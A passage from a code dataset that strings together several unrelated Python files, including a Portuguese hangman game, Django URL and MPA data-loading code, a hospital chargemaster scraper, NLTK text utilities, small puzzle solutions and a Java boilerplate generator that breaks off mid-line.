print('''\n----Parabéns!!!!------\n───▐▀▄─────────▄▀▌───\n───▐▓░▀▄▀▀▀▀▀▄▀░▓▌───\n───▐░▓░▄▀░░░▀▄░▓░────\n────█░░▌█▐░▌█▐░░█────\n─▄▄▄▐▀░░░▀█▀░░░▀▌▄▄▄─\n█▐▐▐▌▀▄░▀▄▀▄▀░▄▀▐▌▌▌█\n▀▀▀▀▀▀▀▀▀▄▄▄▀▀▀▀▀▀▀▀▀\n───Você ganhou !!!───\n─────────────────────''')\ndef erro7():\n print('''\n███▀▀▀██┼███▀▀▀███┼███▀█▄█▀███┼██▀▀▀\n██┼┼┼┼██┼██┼┼┼┼┼██┼██┼┼┼█┼┼┼██┼██┼┼┼\n██┼┼┼▄▄▄┼██▄▄▄▄▄██┼██┼┼┼▀┼┼┼██┼██▀▀▀\n██┼┼┼┼██┼██┼┼┼┼┼██┼██┼┼┼┼┼┼┼██┼██┼┼┼\n███▄▄▄██┼██┼┼┼┼┼██┼██┼┼┼┼┼┼┼██┼██▄▄▄\n┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼\n███▀▀▀███┼▀███┼┼██▀┼██▀▀▀┼██▀▀▀▀██▄┼\n██┼┼┼┼┼██┼┼┼██┼┼██┼┼██┼┼┼┼██┼┼┼┼┼██┼\n██┼┼┼┼┼██┼┼┼██┼┼██┼┼██▀▀▀┼██▄▄▄▄▄▀▀┼\n██┼┼┼┼┼██┼┼┼██┼┼█▀┼┼██┼┼┼┼██┼┼┼┼┼██┼\n███▄▄▄███┼┼┼─▀█▀┼┼─┼██▄▄▄┼██┼┼��┼┼██▄\n┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼\n┼┼┼┼┼┼┼┼██┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼██┼┼┼┼┼┼┼┼┼\n┼┼┼┼┼┼████▄┼┼┼▄▄▄▄▄▄▄┼┼┼▄████┼┼┼┼┼┼┼\n┼┼┼┼┼┼┼┼┼▀▀█▄█████████▄█▀▀┼┼┼┼┼┼┼┼┼┼\n┼┼┼┼┼┼┼┼┼┼┼█████████████┼┼┼┼┼┼┼┼┼┼┼┼\n┼┼┼┼┼┼┼┼┼┼┼██▀▀▀███▀▀▀██┼┼┼┼┼┼┼┼┼┼┼┼\n┼┼┼┼┼┼┼┼┼┼┼██┼┼┼███┼┼┼██┼┼┼┼┼┼┼┼┼┼┼┼\n┼┼┼┼┼┼┼┼┼┼┼█████▀▄▀█████┼┼┼┼┼┼┼┼┼┼┼┼\n┼┼┼┼┼┼┼┼┼┼┼┼███████████┼┼┼┼┼┼┼┼┼┼┼┼┼\n┼┼┼┼┼┼┼┼▄▄▄██┼┼█▀█▀█┼┼██▄▄▄┼┼┼┼┼┼┼┼┼\n┼┼┼┼┼┼┼┼▀▀██┼┼┼┼┼┼┼┼┼┼┼██▀▀┼┼┼┼┼┼┼┼┼\n┼┼┼┼┼┼┼┼┼┼▀▀┼┼┼┼┼┼┼┼┼┼┼▀▀┼┼┼┼┼┼┼┼┼┼┼''')\n#-----------FUNÇÃO RETORNO e PARÂMETRO-------\n#abaixo está o seletor de posição, resposável por escolher uma determinada palavra da lista\ndef posicao(a,b):\n aleatorio = randint(a,b)\n return aleatorio #irá retornar para posicao o valor de \"a\", essa variavel só vale aqui dentro\n\ndef tracinhos_e_dicas():\n print(\"dica: \",listaDicas[x])\n print(\" _\" * (len(escolhida)-1)) #Esse é apenas o print Inicial, antes do laço de repetição\n\noption = 0\nwhile option != 4:\n print('''Selecione a opção:\n--------------------------------\n1 - para jogar\n2 - para cadastrar\n3 - para listar\n4 - para sair\n--------------------------------\n''')\n option = int(input('Insira um Nº:'))\n if option == 1:\n #inicio do código da forca...\n\n listaPalavras = []\n listaDicas = []\n #inserindo palavras\n arq = open(\"arquivos/palavras.txt\",\"r\")\n conteudo = arq.readlines()\n for x in range(0,len(conteudo)):\n listaPalavras.append(conteudo[x])\n arq.close()\n #inserindo dicas\n arq = open(\"arquivos/dicas.txt\",\"r\")\n conteudo = arq.readlines()\n for x in range(0,len(conteudo)):\n listaDicas.append(conteudo[x])\n arq.close()\n\n\n\n reiniciar = \"s\"\n while reiniciar == \"s\":\n # abaixo é -1 porque a lista começa em 0, se não tiver o -1 vai passar o tanto de posições, aqui estou trabalhando com posições\n x = posicao(0, len(listaPalavras)-1) #transferi o valor da função para a variavel \"x\"---------<----------<--------<--------<-------<----<-\n #pega o valor de \"x\" e verifica na lista a palavra, estão guarda uma palavra em 
escolhida\n escolhida = listaPalavras[x] # o \"X\" refere-se a posição escolhida, no caso escolhe uma palavra da lista\n\n\n #listas vazias para armazenar dados\n descobertas = []\n digitadas = []\n\n #-1 por causa do bug da lista\n for c in range(0,len(escolhida)-1): #essa parte percorre cada letra da palavra escolhida aleatoriamente, uma palavra pode ser uma lista...\n descobertas.append(\"_\") #coloca traço na lista vazia de descobertas\n\n tracinhos_e_dicas() #exibe os tracinhos iniciais e a dicas...\n\n acertou = False\n erros = 0\n\n while acertou == False:\n acertos = 0\n print(\" \")\n letra = input(str(\"Dígite uma letra: \")).lower() #letra fica minúscula\n\n if letra in digitadas:\n print(\"Você já tentou essa letra !!\") #verifica se a letra ja foi digitada\n else:\n digitadas.append(letra) # a letra vai para a lista de digitadas, para evitar repetições\n print(\"--------------------------------\")\n print(\"Dica: \",listaDicas[x])\n\n for c in range(0, len(escolhida)-1): #-1 por causa do bug da lista\n if letra == escolhida[c]: #se alguma letra é igual a palavra da lista\"escolhida\"\n descobertas[c] = letra #substitui o tracinho de descoberta pela letra\n acertos+=1\n\n print(descobertas[c], end=' ')\n\n if acertos == 0: #contador de erros, se não tiver nenhum acerto na rodada, soma mais um erro\n erros+=1\n\n if erros == 1:\n erro1() #isso é uma função, relaciona com o desenho lá em cima\n elif erros == 2:\n erro2()\n elif erros == 3:\n erro3()\n elif erros == 4:\n erro4()\n elif erros == 5:\n erro5()\n elif erros == 6:\n erro6()\n if erros == 7:\n erro7()\n break #sai do laço de repetição para dar fim no jogo\n\n acertou = True # se chegou até aqui acertou fica TRUE\n for z in range(0, len(descobertas)):\n if descobertas[z] == \"_\":\n acertou = False #pula lá para cima se tiver algum tracinho ainda\n\n if erros < 7: #se o erro for < 7 dá o parabéns\n print(\" \")\n ganhou()\n\n reiniciar = str(input(\"Insira (s) para jogar novamente e (n) para sair: \")).lower()\n if reiniciar == \"n\":\n break #se o usuário escolher(2) sai do programa\n#Tela de cadastro\n if option == 2:\n print(\"------------Tela de Cadastro de palavras-----------------\")\n print(\" \")\n arq = open(\"arquivos/palavras.txt\",\"a\")#trabalha com aquivo txt.\n #escrevendo na variável arq\n palavraArq = input(\"informe a palavra a ser cadastrada: \")\n arq.writelines(palavraArq+\"\\n\") #cuidade com write e writelines\n #Salva as modificações e salva o arquivo\n arq.close()\n print(\" \")\n\n print(\"------------Tela de Cadastro de dicas-----------------\")\n print(\" \")\n arq = open(\"arquivos/dicas.txt\",\"a\")#trabalha com aquivo txt.\n #escrevendo na variável arq\n dicasArq = input(\"informe a dica a ser cadastrada: \")\n arq.writelines(dicasArq+\"\\n\") #cuidade com write e writelines\n #Salva as modificações e salva o arquivo\n arq.close()\n print(\" \")\n if option == 3:\n arq = open(\"arquivos/palavras.txt\",\"r\")\n conteudo = arq.readlines()\n for x in range(0,len(conteudo)):\n print(conteudo[x])\n arq.close()\n # if option == 4:\n # if option == 5:\n# .upper\n# listaPalavras = [\n# \"arvore\",\"casa\", \"mercedes\", \"fitness\", \"fortnite\", \"mustang\", \"zebra\",\"dinossauro\",\"laranja\",\"minecraft\"]\n# listaDicas = [\n# \"tem folhas...\",\"serve de abrigo...\", \"marca de carro...\", \"academia...\", \"um jogo battle royale...\", \"um muscle car...\", \"um animal...\",\"Um animal já extinto...\",\"Uma cor...\",\"Um jogo de construções...\"]\n","sub_path":"3 trimestre/parte 
1/forca.py","file_name":"forca.py","file_ext":"py","file_size_in_byte":11352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"417921483","text":"from django.conf.urls import include, url\nfrom django.contrib import admin\nfrom . import views\nadmin.autodiscover()\n\nurlpatterns = [\n url(r'^$', views.index),\n url(r'^list/$', views.list),\n url(r'^(.*)/weight/$', views.weight),\n url(r'^(.*)/$', views.detail),\n]\n","sub_path":"aircraft/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"13975650","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport requests\nimport urllib.error\nimport urllib.request\nimport time\nfrom bs4 import BeautifulSoup\nimport os\nimport re\n\n\nclass Scraper(object):\n VALID_EXTENSIONS = ('.xlsx', '.xls', '.csv')\n ROOT_PATH = os.path.abspath(r'H:/oshpd_chargemasters/') # could be very large, so it's going on external HD\n\n URL_ROOT = 'https://oshpd.ca.gov/'\n URL_CHARGEMASTER = 'https://oshpd.ca.gov/data-and-reports/cost-transparency/hospital-chargemasters/{}-chargemasters/'\n\n YEAR_PATTERN = re.compile(r'/Chargemaster/(\\d{4})')\n HOSPITAL_PATTERN = re.compile(r'/Chargemaster/\\d{4}/(.*)/')\n FILENAME_PATTERN = re.compile(r'/Chargemaster/\\d{4}/.*/(.*)')\n\n def __init__(self, years=range(2011, 2020), start_index=70):\n \"\"\"\n\n :param years: Years to scrape\n :param start_index: The starting point for downloads\n \"\"\"\n self.years = years\n self.start_index = start_index\n self.url_by_year = {y: self.URL_CHARGEMASTER.format(y) for y in range(2011, 2020)}\n\n @staticmethod\n def download(url, file_path):\n urllib.request.urlretrieve(url, file_path)\n\n @staticmethod\n def _make_dir_if_new(dir_path):\n if not os.path.isdir(dir_path):\n os.mkdir(dir_path)\n\n def _dir_join_and_make(self, root, new):\n dir_path = os.path.join(root, new)\n self._make_dir_if_new(dir_path)\n return dir_path\n\n def download_all_chargemasters(self):\n for y in self.years:\n a_tags = self.get_link_tags_from_url_from_year(y)\n data_tags = a_tags[self.start_index:]\n download_urls = [self.URL_ROOT + tag['href'].replace('\\\\', '/').replace(' ', '%20') for tag in data_tags]\n\n for url in download_urls:\n filename, hospital, year = self.metadata_from_url(url)\n if filename is None:\n continue\n is_spreadsheet = any(extension in filename for extension in self.VALID_EXTENSIONS)\n\n if is_spreadsheet:\n dir_path_year = self._dir_join_and_make(self.ROOT_PATH, year)\n dir_path = self._dir_join_and_make(dir_path_year, hospital)\n file_path = os.path.join(dir_path, filename)\n\n self._try_download(file_path, filename, hospital, url, year)\n time.sleep(0.5)\n\n def get_link_tags_from_url_from_year(self, year):\n response = requests.get(self.url_by_year[year])\n html_response = BeautifulSoup(response.text, 'html.parser')\n a_tags = html_response.findAll('a')\n return a_tags\n\n def metadata_from_url(self, url):\n try:\n year = re.findall(self.YEAR_PATTERN, url)[0]\n hospital = re.findall(self.HOSPITAL_PATTERN, url)[0].replace('%20', '_')\n filename = re.findall(self.FILENAME_PATTERN, url)[0].replace('%20', '_')\n return filename, hospital, year\n except IndexError:\n return None, None, None\n\n def _try_download(self, file_path, filename, hospital, url, year):\n try:\n self.download(url, file_path)\n print(f'{year}, {hospital}, {filename}')\n except urllib.error.HTTPError:\n print(f'404 : {year}, {hospital}, 
{filename}')\n","sub_path":"scrape/scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":3292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"196051405","text":"def lc(ny1,ni2):\n if ny1>ni2:\n a2=ny1\n else:\n a2=ni2\n while(True):\n if a2%ny1==0 and a2%ni2==0:\n l1=a2\n break\n a2=a2+1\n return l1\n \nny1,ni2=map(int,input().split())\nano=lc(ny1,ni2)\nprint(ano)\n\n\n\n\n\n","sub_path":"codekata/now.py","file_name":"now.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"355153833","text":"import inflect\nimport string\nfrom nltk.corpus import stopwords\nfrom nltk.stem.porter import PorterStemmer\nfrom nltk.tokenize import word_tokenize\nfrom nltk.stem import WordNetLemmatizer\n# nltk.download('wordnet')\n\nengine = inflect.engine()\nstemmer = PorterStemmer()\nlemmatizer = WordNetLemmatizer()\n\n\ndef remove_punctuation(text):\n translator = str.maketrans('', '', string.punctuation)\n text = text.translate(translator)\n return \" \".join(text.split())\n\n\ndef convert_number(text):\n temp_str = text.split()\n new_string = []\n for word in temp_str:\n if word.isdigit():\n temp = engine.number_to_words(word)\n new_string.append(temp)\n else:\n new_string.append(word)\n temp_str = ' '.join(new_string)\n return temp_str\n\n\ndef remove_stopwords(text):\n stop_words = stopwords.words('english')\n stop_words.remove('not')\n word_tokens = word_tokenize(text)\n filtered_text = [word for word in word_tokens if word not in stop_words]\n return filtered_text\n\n\ndef stem_and_lemmatize_word(word_tokens):\n word_tokens = [stemmer.stem(word) for word in word_tokens] # check the results, maybe remove 1\n lemmas = [lemmatizer.lemmatize(word, pos='v') for word in word_tokens]\n return lemmas\n\n\ndef converter(array):\n array = [\" \".join(i) for i in array]\n return array\n\n\ndef split_array(array):\n array_split = []\n for i in array:\n array_split.append(i.split())\n return array_split\n","sub_path":"python/classifier/text/textUtils.py","file_name":"textUtils.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"159090479","text":"#Calculate the Difference in Days between Two Given Dates\n\nfrom datetime import date\n\nfecha_actual = date(2020,7,18)\notra_fecha = date(2021,7,18)\n\ndelta = otra_fecha-fecha_actual\nprint(delta) #365 days, 0:00:00\nprint(delta.days) #365\n","sub_path":"14-Calcular la Diferencia en Días de Dos Fechas Dadas.py","file_name":"14-Calcular la Diferencia en Días de Dos Fechas Dadas.py","file_ext":"py","file_size_in_byte":229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"132679758","text":"from __future__ import print_function\nimport os, re, csv\nfrom django.contrib.gis.utils import LayerMapping\nfrom .models import MpaCandidate, mpacandidate_mapping\nfrom .models import Mpa, Contact, CandidateInfo\nfrom wdpa.models import WdpaPolygon, WdpaPoint\nfrom usmpa.models import USMpaPolygon\n\nfrom django.contrib.gis import geos, gdal\n\nfrom django.db import connection, transaction\n\nmpacandidate_shp = os.path.abspath(\n os.path.join(os.path.dirname(__file__), \"data/Potential_MPAs/Potential_MPAs.shp\")\n)\n\n\ndef import_candidates():\n cfilename = os.path.abspath(\n os.path.join(\n os.path.dirname(__file__),\n 
\"data/Potential_MPAs/Candidate_MPAs_MPAtlas_20120523.csv\",\n )\n )\n cfile = open(cfilename, \"rU\")\n creader = csv.reader(cfile, csv.excel)\n line = -1\n for row in creader:\n line += 1\n if line == 0:\n continue\n name = row[1]\n lon = row[2]\n lat = row[3]\n\n print(name)\n\n mpa = Mpa.objects.get_or_create(name=name, status=\"Proposed\")[0]\n mpa.status = \"Proposed\"\n mpa.country = \"\"\n mpa.is_point = True\n try:\n lon = float(lon)\n lat = float(lat)\n point = geos.Point(lon, lat, srid=gdal.SpatialReference(\"WGS84\").srid)\n multipoint = geos.MultiPoint(\n point, srid=gdal.SpatialReference(\"WGS84\").srid\n )\n mpa.point_geom = multipoint\n mpa.point_geog = multipoint\n mpa.point_geom_smerc = multipoint.transform(3857)\n mpa.point_within = point\n except:\n print(\" ERROR: could not create point\")\n pass\n mpa.save()\n\n candidate = CandidateInfo.objects.get_or_create(mpa=mpa)[0]\n\n candidate.source = row[4]\n candidate.scope = row[5]\n candidate.basin = row[6]\n candidate.region = row[7]\n candidate.location = row[8]\n candidate.eez_or_highseas = row[9]\n candidate.lead_organization = row[10]\n candidate.partner_organizations = row[11]\n candidate.key_agency_or_leader = row[12]\n candidate.timeframe = row[13]\n candidate.current_protection = row[14]\n candidate.desired_protection = row[15]\n candidate.importance = row[16]\n candidate.opportunity = row[17]\n candidate.reference1 = row[18]\n candidate.reference1 = row[19]\n\n candidate.save()\n\n\ndef run_mpacandidate(strict=True, verbose=True, **kwargs):\n lm_mpacandidate = LayerMapping(\n MpaCandidate,\n mpacandidate_shp,\n mpacandidate_mapping,\n transform=False,\n encoding=\"iso-8859-1\",\n )\n lm_mpacandidate.save(strict=strict, verbose=verbose, **kwargs)\n\n\ndef wdpapoly2mpa():\n wpolys = (\n WdpaPolygon.objects.all()\n .defer(*WdpaPolygon.get_geom_fields())\n .order_by(\"wdpaid\")\n )\n count = 0\n for wpoly in wpolys:\n mpa, created = Mpa.objects.get_or_create(wdpa_id=wpoly.wdpaid)\n count += 1\n print(count)\n mpa.name = wpoly.name\n mpa.wdpa_id = wpoly.wdpaid\n mpa.country = wpoly.country\n mpa.sub_location = wpoly.sub_loc\n mpa.designation = wpoly.desig\n mpa.designation_eng = wpoly.desig_eng\n mpa.designation_type = wpoly.desig_type\n mpa.iucn_category = wpoly.iucn_cat\n mpa.int_criteria = wpoly.int_crit\n mpa.marine = wpoly.marine\n mpa.status = wpoly.status\n mpa.status_year = wpoly.status_yr\n mpa.area_notes = wpoly.area_notes\n mpa.rep_m_area = wpoly.rep_m_area\n mpa.calc_m_area = wpoly.gis_m_area\n mpa.rep_area = wpoly.rep_area\n mpa.calc_area = wpoly.gis_area\n mpa.gov_type = wpoly.gov_type\n mpa.mgmt_auth = wpoly.mang_auth\n mpa.mgmt_plan_ref = wpoly.mang_plan\n\n # mpa.geom_smerc = wpoly.geom_smerc\n # mpa.geom = wpoly.geom\n # mpa.geog = wpoly.geog\n\n mpa.save()\n\n # SQL update all geometry rows, much faster than through django\n print(\"UPDATE geometry columns\")\n cursor = connection.cursor()\n cursor.execute(\n \"UPDATE mpa_mpa SET geog = w.geog FROM wdpa_wdpapolygon as w WHERE mpa_mpa.wdpa_id = w.wdpaid\"\n )\n transaction.commit_unless_managed()\n print(\"UPDATE complete\")\n\n Mpa.set_all_geom_from_geog()\n\n\ndef wdpapoint2mpa():\n wpoints = WdpaPoint.objects.all().order_by(\"wdpaid\")\n count = 0\n for wpoint in wpoints:\n try:\n mpa, created = Mpa.objects.get_or_create(wdpa_id=wpoint.wdpaid)\n except:\n mpa = Mpa() # create a new object if wpoint has no wdpaid\n print(\"wdpaid error\", wpoint.wdpaid, wpoint.pk)\n count += 1\n print(count)\n mpa.is_point = True\n mpa.name = wpoint.name\n 
mpa.wdpa_id = wpoint.wdpaid\n mpa.country = wpoint.country\n mpa.sub_location = wpoint.sub_loc\n mpa.designation = wpoint.desig\n mpa.designation_eng = wpoint.desig_eng\n mpa.designation_type = wpoint.desig_type\n mpa.iucn_category = wpoint.iucn_cat\n mpa.int_criteria = wpoint.int_crit\n mpa.marine = wpoint.marine\n mpa.status = wpoint.status\n mpa.status_year = wpoint.status_yr\n mpa.rep_m_area = wpoint.rep_m_area\n mpa.rep_area = wpoint.rep_area\n mpa.gov_type = wpoint.gov_type\n mpa.mgmt_auth = wpoint.mang_auth\n mpa.mgmt_plan_ref = wpoint.mang_plan\n\n # mpa.point_geom_smerc = wpoint.point_geom_smerc\n # mpa.point_geom = wpoint.point_geom\n # mpa.point_geog = wpoint.point_geog\n\n mpa.save()\n\n # SQL update all geometry rows, much faster than through django\n print(\"UPDATE point geometry columns\")\n cursor = connection.cursor()\n cursor.execute(\n \"UPDATE mpa_mpa SET point_geog = w.geog FROM wdpa_wdpapoint as w WHERE mpa_mpa.wdpa_id = w.wdpaid\"\n )\n transaction.commit_unless_managed()\n print(\"UPDATE complete\")\n\n Mpa.set_all_geom_from_geog()\n\n\ndef usmpa2mpa(usmpa_id=None):\n usmpas = (\n USMpaPolygon.objects.all()\n .defer(*USMpaPolygon.get_geom_fields())\n .order_by(\"site_id\")\n )\n if usmpa_id is not None:\n usmpas = usmpas.filter(site_id=usmpa_id)\n count = 0\n for usmpa in usmpas:\n mpa, created = Mpa.objects.get_or_create(usmpa_id=usmpa.site_id)\n count += 1\n print(count, usmpa.site_name, usmpa.state, usmpa.site_id)\n mpa.name = usmpa.site_name\n mpa.long_name = usmpa.site_name\n mpa.short_name = usmpa.site_label\n mpa.usmpa_id = usmpa.site_id\n mpa.country = \"USA\"\n\n mpa.mgmt_auth = usmpa.mgmt_agency\n if usmpa.mgmt_plan and usmpa.mgmt_plan.lower() != \"no management plan\":\n mpa.mgmt_plan_type = usmpa.mgmt_plan\n mpa.mgmt_plan_ref = None\n mpa.gov_type = usmpa.gov_level\n\n statecode = re.compile(r\"^(\\D\\D)\\d*\")\n match = statecode.match(usmpa.site_id)\n if match:\n mpa.sub_location = match.group(1)\n print(\" \", mpa.sub_location)\n\n mpa.constancy = usmpa.constancy\n if usmpa.permanence == \"Permanent\":\n mpa.permanence = \"Permanent\"\n elif usmpa.permanence == \"Conditional\":\n mpa.permanence = \"Non-Permanent - Conditional\"\n elif usmpa.permanence == \"Temporary\":\n mpa.permanence = \"Non-Permanent - Temporary\"\n\n # mpa.designation = usmpa.desig\n # mpa.designation_eng = usmpa.desig_eng\n mpa.designation_type = \"National\"\n mpa.marine = True\n mpa.status = \"Designated\"\n\n if usmpa.establishment_year:\n mpa.status_year = int(usmpa.establishment_year)\n\n # mpa.protection_level\n\n if usmpa.primary_conservation_focus == \"Natural Heritage\":\n mpa.primary_conservation_focus == \"Biodiversity Protection\"\n elif usmpa.primary_conservation_focus == \"Sustainable Production\":\n mpa.primary_conservation_focus == \"Biomass Enhancement\"\n elif usmpa.primary_conservation_focus == \"Cultural Heritage\":\n mpa.primary_conservation_focus == \"Cultural Heritage\"\n else:\n mpa.primary_conservation_focus == \"Unknown\"\n\n confoci = usmpa.conservation_focus.split(\" and \")\n for i in range(0, len(confoci)):\n confocus = confoci[i]\n if confocus == \"Natural Heritage\":\n confocus == \"Biodiversity Protection\"\n elif confocus == \"Sustainable Production\":\n confocus == \"Biomass Enhancement\"\n elif confocus == \"Cultural Heritage\":\n confocus == \"Cultural Heritage\"\n else:\n confocus == \"Unknown\"\n if i == 0:\n mpa.secondary_conservation_focus = confocus\n else:\n tertiary_conservation_focus = confocus\n\n if usmpa.protection_focus == 
\"Ecosystem\":\n mpa.protection_focus = \"Ecosystem\"\n elif usmpa.protection_focus == \"Focal Resource\":\n mpa.protection_focus = \"Focal Species\"\n\n if usmpa.fishing_restriction == \"No Site Restrictions\":\n mpa.fishing = \"Yes\"\n elif (\n usmpa.fishing_restriction\n == \"Commercial and Recreational Fishing Prohibited\"\n ):\n mpa.fishing = \"No\"\n elif usmpa.fishing_restriction == \"Restrictions Unknown\":\n mpa.fishing = \"Unknown\"\n else:\n mpa.fishing = \"Some Restrictions\"\n mpa.fishing_info = usmpa.fishing_restriction\n\n if usmpa.vessel == \"Prohibited\":\n mpa.access = \"No\"\n elif usmpa.vessel == \"Restricted\":\n mpa.access = \"Restricted\"\n elif usmpa.vessel == \"Unrestricted\":\n mpa.access = \"Yes\"\n\n # Create a contact and url for this site\n c, created = Contact.objects.get_or_create(\n agency=usmpa.site_label + \" Website\", url=usmpa.url\n )\n # c.mpa_main_set.add(mpa)\n mpa.contact = c\n\n # mpa.geom_smerc = wpoly.geom_smerc\n # mpa.geom = wpoly.geom\n # mpa.geog = wpoly.geog\n\n mpa.save()\n\n # SQL update all geometry rows, much faster than through django\n print(\"UPDATE geometry columns\")\n cursor = connection.cursor()\n cursor.execute(\n \"UPDATE mpa_mpa SET geom = u.geom, geog = u.geog, geom_smerc = u.geom_smerc FROM usmpa_usmpapolygon as u WHERE mpa_mpa.usmpa_id = u.site_id\"\n )\n transaction.commit_unless_managed()\n print(\"UPDATE complete\")\n\n Mpa.set_all_geom_from_geog()\n","sub_path":"mpa/load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":10550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"219000507","text":"def Is():\n return input()\n\n\ndef Iss():\n return input().split()\n\n\ndef Ii():\n return int(input())\n\n\ndef Iis():\n return map(int, input().split())\n\n\ndef Iil():\n return list(map(int, input().split()))\n\n\ndef Ixy(N):\n return [list(map(int, input().split())) for l in range(N)]\n\n\ndef Ixyind(N):\n xy = [map(int, input().split()) for _ in range(N)]\n return [list(i) for i in zip(*xy)]\n\n\ndef Imixind(N):\n list = []\n for i in range(N):\n a, b = input().split()\n list.append([int(a), b])\n return list\n\n\n#####################################################################\nimport sys\n\nsys.setrecursionlimit(100000)\n# N = Ii()\n# S = Is()\nN, Q = Iis()\n# l = Iil()\n# X,Y = Ixyind(N)\n# XY = Ixy(N)\n\n\nclass Node:\n def __init__(self):\n self.parents = []\n self.children = []\n self.depth = None\n\n\ndef cal_depth(node_id, d=0):\n Tree[node_id].depth = d\n for child in Tree[node_id].children:\n if Tree[child].depth == None:\n cal_depth(child, d + 1)\n for parent in Tree[node_id].parents:\n if Tree[parent].depth == None:\n cal_depth(parent, d - 1)\n\n\nTree = [Node() for _ in range(N)]\n\nfor i in range(N - 1):\n #id, number of children k, c_0~c_k\n tree_info = list(map(int, input().split()))\n node_id = tree_info[0] - 1\n k = 1\n\n if k > 0:\n children = tree_info[1] - 1\n Tree[node_id].children.append(children)\n Tree[node_id].type = \"internal node\"\n else:\n Tree[node_id].type = \"leaf\"\n\n for child in Tree[node_id].children:\n Tree[child].parents.append(node_id)\n\n#search_root\nroot_id = [i for i, t in enumerate(Tree) if t.parents == []][0]\nTree[root_id].type = \"root\"\ncal_depth(root_id)\n\n# answer_output\n# for i, t in enumerate(Tree):\n# print(\"node {}: parents = {}, depth = {}, {}\".format(i, t.parents, t.depth, t.children))\nfor _ in range(Q):\n c, d = Iis()\n c -= 1\n d -= 1\n if Tree[c].depth % 2 == Tree[d].depth % 2:\n print(\"Town\")\n 
else:\n        print("Road")\n","sub_path":"src/data/570.py","file_name":"570.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"382121256","text":"Information="""\r\n/***\r\nAutomates the basic Writing of a Java Class\r\nAuthor: Liam Johnston\r\nDate: 10/13/2016\r\nInfo: When you are done entering instance fields, enter a blank one to print out the basic java class\r\nVersion 3.0 \r\n+Setters for variables\r\n+Infinite Variables\r\n-Alphabet\r\n***/\r\n"""\r\nimport time#Import the time module to slow down code so that it is possible to copy the result\r\n#Defining Variables\r\ncn=input("\\n\\n\\nClass Name: ")#Asks the user for the name of the class\r\nprint("\\n")#\\n prints a blank line so that the user may visually see the change in request\r\n\r\n#it is used to store the type of the instance fields\r\nglobal it#makes a variable global so that all methods can use it\r\n#Similar to private String it; minus the String part that is defined next\r\nglobal int_name#int_name keeps the names of the instance fields\r\nglobal counter\r\n\r\nit=""#Defining it as an empty String\r\nint_name=""#Defining the fact that int_name is an empty String\r\ncounter=0 # used for limiting the number of loops to the amount of instance fields\r\n\r\n\r\n#Template is used to print the readable copied code\r\ndef Template(T1, T2, T3, U1):#Upon calling the Template method you need to define the\r\n#Name of the class, the types of the variables, the names of the variables, and a \r\n#number of the amount of instance fields\r\n    #T1 ClassName, T2 Type, T3 Name, U1 number of instance fields\r\n    print(Information)\r\n    print("\\n\\n","-"*30,"\\n\\n")#Gives some elbow room\r\n    print("public class ",T1,"{")\r\n    print("//Instance Fields")\r\n    \r\n    #Separate the different types and names\r\n    one_sep=T2.split()#All .split() does is make sure that all the items in the String \r\n    #name are separate and different to help with later coding\r\n    two_sep=T3.split()\r\n    \r\n    #backup_U1 = 0\r\n    backup_U1 = U1#This is used for restoring the amount of \r\n    #Instance fields so that the forevers only run for so long.\r\n    pop = U1# I got lazy so I made a second one / I forgot about backup_U1\r\n    #Prints the items in the list\r\n    for item in T2.split():#For each number of types run this code\r\n        U1 -= 1#Lowers the counter\r\n        print("private",one_sep[U1], two_sep[U1],";")#prints initial calling of class but not\r\n        #just that but using the [] to save me lots of code\r\n        \r\n    U1 = backup_U1 #resets U1\r\n    #Class Constructor\r\n    print("//Class Constructor")\r\n    print("public",T1,"(")\r\n    \r\n    ##Parameters of Constructor\r\n    for item in T2.split():\r\n        U1 -= 1\r\n        print(one_sep[U1], two_sep[U1])\r\n        if U1 > 0:\r\n            print(", ")\r\n    U1 = backup_U1 #resets U1\r\n    print(")")#End Parameters\r\n    \r\n    print("{")\r\n    #Sets constructed variables to the instance fields\r\n    for item in T3.split():\r\n        U1 -=1\r\n        beeboop="this."+two_sep[U1]\r\n        print(beeboop.replace(" ",""),"=" ,two_sep[U1],";")\r\n    U1 = backup_U1 #resets U1\r\n    print("}")\r\n    extra_U2=U1\r\n    #getters\r\n    for item in T3.split():\r\n        U1 -=1\r\n        get= "get"+two_sep[U1].title()\r\n        print("public",one_sep[U1], get.replace(" ",""),"(){return", two_sep[U1],";}")\r\n    \r\n    print("//Setters\\n")\r\n    #Setters\r\n    #T1 ClassName, T2 Type, T3 Name, U1 number of instance fields\r\n    for item in T2.split():\r\n        pop -= 1\r\n        set= " 
